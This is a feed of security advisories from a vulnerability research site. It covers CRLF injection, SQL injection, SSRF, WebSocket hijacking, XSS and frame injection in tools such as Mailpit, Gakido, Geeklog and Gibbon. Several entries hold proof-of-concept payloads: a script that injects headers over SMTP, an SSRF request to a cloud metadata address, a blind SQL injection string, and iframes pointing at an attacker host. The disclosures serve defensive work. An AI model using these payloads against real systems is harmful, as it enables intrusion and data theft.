Security research, vulnerability disclosures, and application security insights. 2026-01-26T00:00:00Z https://rosecurify.com Omar Kurt securify@rosecurify.com 2026-01-26T00:00:00Z https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/">#</a></h2> <p>A vulnerability was discovered in Gakido that allowed HTTP header injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/">#</a></h2> <p>When making HTTP requests with user-controlled header values containing <code>\r\n</code> (CRLF), <code>\n</code> (LF), or <code>\x00</code> (null byte) characters, an attacker could inject arbitrary HTTP headers into the request.</p> <p><strong>Affected Code:</strong> The vulnerability existed in the header processing logic where user-supplied headers were not sanitized before being sent in HTTP requests.</p> <ul> <li><strong>File:</strong> <code>gakido/headers.py</code></li> <li><strong>Function:</strong> <code>canonicalize_headers()</code></li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/">#</a></h2> <p>An attacker who can control header values passed to Gakido's <code>Client.get()</code>, <code>Client.post()</code>, or other request methods could:</p> <ul> <li><strong>Inject arbitrary HTTP headers</strong> - Add malicious headers to requests</li> <li><strong>HTTP Response Splitting</strong> - Potentially manipulate responses in certain proxy configurations</li> <li><strong>Cache Poisoning</strong> - Inject headers that could poison intermediate caches</li> <li><strong>Session Fixation</strong> - Inject session-related headers</li> <li><strong>Bypass Security Controls</strong> - Inject headers that bypass server-side security checks</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/">#</a></h2> <pre class="language-python" tabindex="0"><code class="language-python"><span class="token keyword">from</span> gakido <span class="token keyword">import</span> Client <span class="token comment"># Before fix: X-Injected header would be sent as a separate header</span> c <span class="token operator">=</span> Client<span class="token punctuation">(</span>impersonate<span class="token operator">=</span><span class="token string">"chrome_120"</span><span class="token punctuation">)</span> r <span class="token operator">=</span> c<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">"https://httpbin.org/headers"</span><span class="token punctuation">,</span> headers<span class="token operator">=</span><span class="token punctuation">{</span> <span class="token string">"User-Agent"</span><span class="token punctuation">:</span> <span class="token string">"test\r\nX-Injected: pwned"</span> <span class="token punctuation">}</span><span class="token punctuation">)</span> </code></pre> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/">#</a></h2> <ul> <li><a href="https://github.com/HappyHackingSpace/gakido/security/advisories/GHSA-gcgx-chcp-hxp9">GHSA-gcgx-chcp-hxp9</a></li> <li><a href="https://github.com/HappyHackingSpace/gakido/commit/369c67e67c63da510c8a9ab021e54a92ccf1f788">Fix Commit (369c67e)</a></li> <li><a href="https://github.com/HappyHackingSpace/gakido/releases/tag/v0.1.1-1bc6019">Release v0.1.1-1bc6019</a></li> </ul> 2026-01-18T00:00:00Z https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <p>A CRLF Injection vulnerability exists in Mailpit's SMTP server. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters (<code>\r</code>) in email addresses due to insufficient regex validation.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <p><strong>Affected Versions:</strong> &lt;= v1.28.2</p> <p><strong>Root Cause:</strong> The regex patterns used to validate <code>RCPT TO</code> and <code>MAIL FROM</code> addresses fail to exclude <code>\r</code> and <code>\n</code> characters. The <code>\v</code> escape sequence inside a character class only matches Vertical Tab, not CR/LF.</p> <p><strong>Vulnerable Code:</strong> The vulnerability exists in <code>internal/smtpd/smtpd.go</code>:</p> <pre class="language-go" tabindex="0"><code class="language-go">rcptToRE <span class="token operator">=</span> regexp<span class="token punctuation">.</span><span class="token function">MustCompile</span><span class="token punctuation">(</span><span class="token string">`(?i)TO: ?&lt;([^&lt;>\v]+)>( |$)(.*)?`</span><span class="token punctuation">)</span> mailFromRE <span class="token operator">=</span> regexp<span class="token punctuation">.</span><span class="token function">MustCompile</span><span class="token punctuation">(</span><span class="token string">`(?i)FROM: ?&lt;(|[^&lt;>\v]+)>( |$)(.*)?`</span><span class="token punctuation">)</span></code></pre> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <ul> <li>Network access to SMTP port (default 1025)</li> <li>No authentication required</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Inject arbitrary SMTP headers</li> <li>Corrupt email metadata and <code>Received</code> headers</li> <li>Generate malformed <code>.eml</code> files</li> <li>Violate RFC 5321 compliance</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <pre class="language-python" tabindex="0"><code class="language-python"><span class="token keyword">import</span> socket <span class="token keyword">def</span> <span class="token function">exploit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span> s <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span> s<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">"127.0.0.1"</span><span class="token punctuation">,</span> <span class="token number">1025</span><span class="token punctuation">)</span><span class="token punctuation">)</span> s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span> s<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b"EHLO test.com\r\n"</span><span class="token punctuation">)</span> s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span> s<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b"MAIL FROM:&lt;attacker@evil.com>\r\n"</span><span class="token punctuation">)</span> s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span> <span class="token comment"># Injecting \r</span> payload <span class="token operator">=</span> <span class="token string">b"RCPT TO:&lt;victim\rX-Injected: Yes>\r\n"</span> s<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span> resp <span class="token operator">=</span> s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"Server Response: </span><span class="token interpolation"><span class="token punctuation">{</span>resp<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">}</span></span><span class="token string">"</span></span><span class="token punctuation">)</span> <span class="token comment"># Expect 250 OK</span> s<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span> exploit<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <p>Upgrade to Mailpit version 1.28.3 or later.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/">#</a></h2> <ul> <li><a href="https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c">GitHub Security Advisory GHSA-54wq-72mp-cq7c</a></li> <li><a href="https://cwe.mitre.org/data/definitions/93.html">CWE-93: CRLF Injection</a></li> <li><a href="https://cwe.mitre.org/data/definitions/150.html">CWE-150: Improper Neutralization of Escape Sequences</a></li> </ul> 2026-01-13T00:00:00Z https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <p>A SQL Injection vulnerability exists in feedyour.email. The vulnerability allows remote attackers to execute arbitrary SQL commands via the search functionality.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <p><strong>Affected Versions:</strong> &lt;=2.4.1</p> <p><strong>Root Cause:</strong> The search parameter (<code>params[:q]</code>) is passed directly to the SQLite <code>search()</code> function without proper sanitization, allowing attackers to inject malicious SQL commands.</p> <p><strong>Vulnerable Code:</strong> The vulnerability exists in <code>app/controllers/posts_controller.rb</code> where user input is directly passed to the search function:</p> <pre class="language-ruby" tabindex="0"><code class="language-ruby"><span class="token variable">@posts</span> <span class="token operator">=</span> <span class="token variable">@posts</span><span class="token punctuation">.</span>search<span class="token punctuation">(</span>params<span class="token punctuation">[</span><span class="token symbol">:q</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>to_a</code></pre> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <ul> <li>No authentication required.</li> <li>Attacker must have access to the search functionality.</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Extract sensitive data from the database.</li> <li>Modify or delete database contents.</li> <li>Bypass authentication mechanisms.</li> <li>Potentially achieve remote code execution depending on database configuration.</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <p>Using sqlmap, the search parameter was confirmed vulnerable to SQL injection attacks. Boolean-based blind and UNION-based injections were successfully demonstrated.</p> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <p>Upgrade to a patched version of feedyour.email that includes proper input sanitization using character whitelisting.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/">#</a></h2> <ul> <li><a href="https://github.com/indirect/feedyour.email/pull/732">GitHub Pull Request #732</a></li> <li><a href="https://github.com/indirect/feedyour.email/commit/da20b2fad5068b99e1c843bae176b38ebede48d1">Fix Commit</a></li> </ul> 2026-01-10T00:00:00Z https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <p>A Cross-Site WebSocket Hijacking (CSWSH) vulnerability exists in Mailpit. The vulnerability allows remote attackers to intercept sensitive data such as email contents, headers, and server statistics in real-time.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <p><strong>Affected Versions:</strong> &lt;=1.28.1</p> <p><strong>Root Cause:</strong> The Mailpit WebSocket server is configured to accept connections from any origin. This lack of Origin header validation allows attackers to hijack WebSocket connections.</p> <p><strong>Vulnerable Code:</strong> The vulnerability exists in <code>server/websockets/client.go</code> where the <code>CheckOrigin</code> function is explicitly set to return <code>true</code> for all requests, bypassing standard Same-Origin Policy (SOP) protections provided by the gorilla/websocket library.</p> <pre class="language-go" tabindex="0"><code class="language-go"><span class="token keyword">var</span> upgrader <span class="token operator">=</span> websocket<span class="token punctuation">.</span>Upgrader<span class="token punctuation">{</span> ReadBufferSize<span class="token punctuation">:</span> <span class="token number">1024</span><span class="token punctuation">,</span> WriteBufferSize<span class="token punctuation">:</span> <span class="token number">1024</span><span class="token punctuation">,</span> CheckOrigin<span class="token punctuation">:</span> <span class="token keyword">func</span><span class="token punctuation">(</span>r <span class="token operator">*</span>http<span class="token punctuation">.</span>Request<span class="token punctuation">)</span> <span class="token builtin">bool</span> <span class="token punctuation">{</span> <span class="token keyword">return</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> EnableCompression<span class="token punctuation">:</span> <span class="token boolean">true</span><span class="token punctuation">,</span> <span class="token punctuation">}</span></code></pre> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <ul> <li>No authentication required.</li> <li>Victim must visit a malicious website while running Mailpit locally.</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Intercept sensitive email data (subjects, bodies, recipients).</li> <li>Access server statistics.</li> <li>Receive real-time notifications of new emails.</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <p>An attacker can host a malicious website that establishes a WebSocket connection to the victim's Mailpit instance (e.g., <code>ws://localhost:8025/api/events</code>). Since the origin check is disabled, the browser allows this cross-origin connection, leaking all broadcasted events to the attacker.</p> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <p>Upgrade to the latest version of Mailpit (1.21.1 or later) which implements proper Origin validation or removes the unsafe check to allow the library's default protection.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/">#</a></h2> <ul> <li><a href="https://github.com/axllent/mailpit/security/advisories/GHSA-524m-q5m7-79mm">GHSA-524m-q5m7-79mm</a></li> </ul> 2026-01-06T00:00:00Z https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <p>A Server-Side Request Forgery (SSRF) vulnerability exists in Mailpit's /proxy endpoint that allows attackers to make requests to internal network resources.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <p><strong>Affected Versions:</strong> &lt; 1.28.0</p> <p><strong>Location:</strong> <code>/api/v1/proxy</code> endpoint</p> <p><strong>Affected Parameter:</strong> <code>url</code></p> <p><strong>Root Cause:</strong> The vulnerability exists due to insufficient validation of user-supplied URLs. Attackers can supply internal URLs that the server will fetch on their behalf.</p> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <ul> <li>No authentication required</li> <li>Direct access to the Mailpit web interface</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Access internal services (databases, APIs)</li> <li>Scan internal network resources</li> <li>Access cloud metadata endpoints (AWS, GCP, Azure)</li> <li>Potentially pivot to internal systems</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <pre class="language-http" tabindex="0"><code class="language-http"><span class="token request-line"><span class="token method property">GET</span> <span class="token request-target url">/api/v1/proxy?url=http://169.254.169.254/latest/meta-data/</span> <span class="token http-version property">HTTP/1.1</span></span> <span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">mailpit.target.com</span></span></code></pre> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <p>Upgrade to Mailpit version 1.28.1 or later, which includes proper URL validation for the proxy endpoint.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/">#</a></h2> <ul> <li><a href="https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr">GitHub Advisory</a></li> <li><a href="https://github.com/axllent/mailpit/releases/tag/v1.28.1">Mailpit Release Notes</a></li> </ul> 2020-01-01T00:00:00Z https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <p>A Cross-site Scripting (XSS) vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to inject arbitrary web script or HTML.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <p><strong>Affected Versions:</strong> 2.2.1 and earlier</p> <p><strong>Root Cause:</strong> Insufficient input validation and output encoding allows attackers to inject malicious scripts.</p> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <ul> <li>No authentication required</li> <li>Victim must visit a crafted URL or page</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Steal user session cookies</li> <li>Perform actions on behalf of users</li> <li>Access CMS content</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <p><em>Details available upon request.</em></p> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <p>Upgrade to a patched version of Geeklog that includes proper input sanitization.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/">#</a></h2> <ul> <li><a href="https://www.invicti.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/">Invicti Advisory NS-20-001</a></li> </ul> 2020-01-01T00:00:00Z https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <p>A Blind SQL Injection vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to execute arbitrary SQL commands via the <code>uid</code> parameter in <code>comment.php</code>.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <p><strong>Affected Versions:</strong> 2.2.1 and earlier</p> <p><strong>Location:</strong> <code>comment.php</code></p> <p><strong>Affected Parameter:</strong> <code>uid</code></p> <p><strong>Root Cause:</strong> Insufficient input validation on the <code>uid</code> parameter allows SQL Injection attacks.</p> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <ul> <li>No authentication required</li> <li>Direct access to the comment endpoint</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Extract sensitive data from the database</li> <li>Bypass authentication mechanisms</li> <li>Modify or delete database content</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <pre class="language-http" tabindex="0"><code class="language-http"><span class="token request-line"><span class="token method property">POST</span> <span class="token request-target url">/geeklog-2.2.1/public_html/comment.php</span> <span class="token http-version property">HTTP/1.1</span></span> <span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">target.com</span></span> <span class="token header"><span class="token header-name keyword">Content-Type</span><span class="token punctuation">:</span> <span class="token header-value">application/x-www-form-urlencoded</span></span> uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/</code></pre> <p><strong>Time-based Blind SQL Injection:</strong> If the server response is delayed by 25 seconds, the target is vulnerable.</p> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <p>Upgrade to a patched version of Geeklog that includes proper input sanitization and parameterized queries.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/">#</a></h2> <ul> <li><a href="https://www.invicti.com/web-applications-advisories/ns-20-002-blind-sql-injection-in-geeklog/">Invicti Advisory NS-20-002</a></li> </ul> 2020-01-01T00:00:00Z https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <p>A Cross-site Scripting (XSS) vulnerability exists in IlchCMS version 2.1.37. The vulnerability allows remote attackers to inject arbitrary web script or HTML.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <p><strong>Affected Versions:</strong> 2.1.37 and earlier</p> <p><strong>Root Cause:</strong> Insufficient input validation and output encoding allows attackers to inject malicious scripts.</p> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <ul> <li>No authentication required</li> <li>Victim must visit a crafted URL or page</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Steal user session cookies</li> <li>Perform actions on behalf of users</li> <li>Redirect users to malicious websites</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <p><em>Details available upon request.</em></p> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <p>Upgrade to a patched version of IlchCMS that includes proper input sanitization.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/">#</a></h2> <ul> <li>Vendor notification sent</li> </ul> 2018-06-28T00:00:00Z https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <p>Frame Injection vulnerabilities exist in Gibbon v14.0.01. These vulnerabilities allow remote attackers to inject arbitrary HTML frames into the application.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <p><strong>Affected Versions:</strong> v14.0.01 and earlier</p> <p><strong>Root Cause:</strong> Insufficient input validation allows attackers to inject iframe elements.</p> <h2 id="technical-details" tabindex="-1">Technical Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <p><strong>Install Page:</strong></p> <ul> <li>URL: <code>/gibbon-install/installer/install.php?step=2</code></li> <li>Parameters: <code>databaseServer</code>, <code>databaseUsername</code> (POST)</li> <li>Attack Pattern: <code>&lt;iframe src=&quot;http://attacker.com/&quot;&gt;&lt;/iframe&gt;</code></li> </ul> <p><strong>Frontend:</strong></p> <ul> <li>URL: <code>/core/index.php?q=/modules/Resources/resources_view.php</code></li> <li>Parameter: <code>tag</code> (GET)</li> <li>Attack Pattern: <code>&lt;iframe src=&quot;http://attacker.com/&quot;&gt;&lt;/iframe&gt;</code></li> </ul> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <ul> <li>No authentication required for frontend vulnerability</li> <li>Access to install page (typically restricted)</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <p>Remote attackers can exploit these vulnerabilities to:</p> <ul> <li>Inject malicious frames into the application</li> <li>Perform clickjacking attacks</li> <li>Load external malicious content</li> </ul> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <p>Update to a patched version of Gibbon.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/">#</a></h2> <ul> <li><a href="https://www.invicti.com/web-applications-advisories/ns-18-002-frame-injection-vulnerabilities-in-gibbon">Invicti Advisory NS-18-002</a></li> </ul> 2018-01-01T00:00:00Z https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/ <h2 id="overview" tabindex="-1">Overview <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <p>A Cross-site Scripting (XSS) vulnerability exists in TikiWiki CMS version 17.1. The vulnerability allows remote attackers to inject arbitrary web script or HTML.</p> <h2 id="vulnerability-details" tabindex="-1">Vulnerability Details <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <p><strong>Affected Versions:</strong> 17.1 and earlier</p> <p><strong>Root Cause:</strong> Insufficient input validation and output encoding allows attackers to inject malicious scripts.</p> <h2 id="exploitation-requirements" tabindex="-1">Exploitation Requirements <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <ul> <li>No authentication required</li> <li>Victim must visit a crafted URL or page</li> </ul> <h2 id="impact" tabindex="-1">Impact <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <p>Remote attackers can exploit this vulnerability to:</p> <ul> <li>Steal admin session cookies</li> <li>Access wiki content</li> <li>Perform actions on behalf of users</li> </ul> <h2 id="proof-of-concept" tabindex="-1">Proof of Concept <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <p><em>Details available upon request.</em></p> <h2 id="solution" tabindex="-1">Solution <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <p>Upgrade to a patched version of TikiWiki that includes proper input sanitization.</p> <h2 id="references" tabindex="-1">References <a class="header-anchor" href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/">#</a></h2> <ul> <li>Vendor notification sent</li> </ul>